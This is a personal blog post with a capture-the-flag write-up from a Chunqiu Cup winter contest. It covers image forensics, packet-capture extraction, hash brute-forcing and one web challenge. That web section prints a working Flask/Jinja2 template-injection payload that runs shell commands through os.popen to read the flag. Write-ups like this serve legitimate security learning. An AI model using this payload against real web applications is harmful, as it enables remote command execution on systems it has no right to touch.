ljnljn的春秋杯冬季赛wp(1.17)
杂项
1、See anything in these pics?
压缩包里有个码,确认是aztec码

这个是压缩包密码,解压出一张图片
binwalk找到多个图片,foremost分离
1 | 1:JPEG image data, JFIF standard 1.01 |
分离后发现一张全黑照片,分析后发现crc校验不通过,修复高宽后得到最后的flag

2、简单镜像提取
是一个流量文件,直接文件——导出对象,得到两个文件

其中一个有信息
1 | 9584上传文件名: please recovery.zip<br>文件类型: application/x-zip-compressed<br>文件大小: 9.359375 kB<br>文件临时存储的位置: C:\Users\Go up\AppData\Local\Temp\php48E.tmp<br>文件存储在: upload/please recovery.zip |
推测另一个就是zip文件
zip文件打开后里面有个img文件,解压,随后用filelocator直接搜flag

找到后提交不正确,原因是把末尾的7一起交了

再交的时候成功
3、简单算术
根据题目提示用cyberchef解异或

密码
1、你是小哈斯?
先用hashes网站尝试了一下,爆破出的基本都是一位字符的形式,猜测全是这样

于是写了爆破代码
1 | import hashlib |
获得flag

2、通往哈希的旅程
查了一下是sha1形式

且已知一共11位,前3位是188,写脚本
1 | import hashlib |
之后就能获得电话号码(爆破时间太长就不再爆破了)
网络安全
1、easy_flask
有个输入框,填一下flask常见漏洞

发现能运行

填入{{ config.__class__.__init__.__globals__['os'].popen('cd flag;cat flag').read() }}
获得flag

(希望明天能写多点呜呜)
- 标题: ljnljn的春秋杯冬季赛wp(1.17)
- 作者: ljnljn
- 创建于 : 2025-01-17 19:46:00
- 更新于 : 2026-05-25 22:04:46
- 链接: https://ljnljn2005.github.io/2025/01/17/ljnljn的春秋杯冬季赛wp(1.17)/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。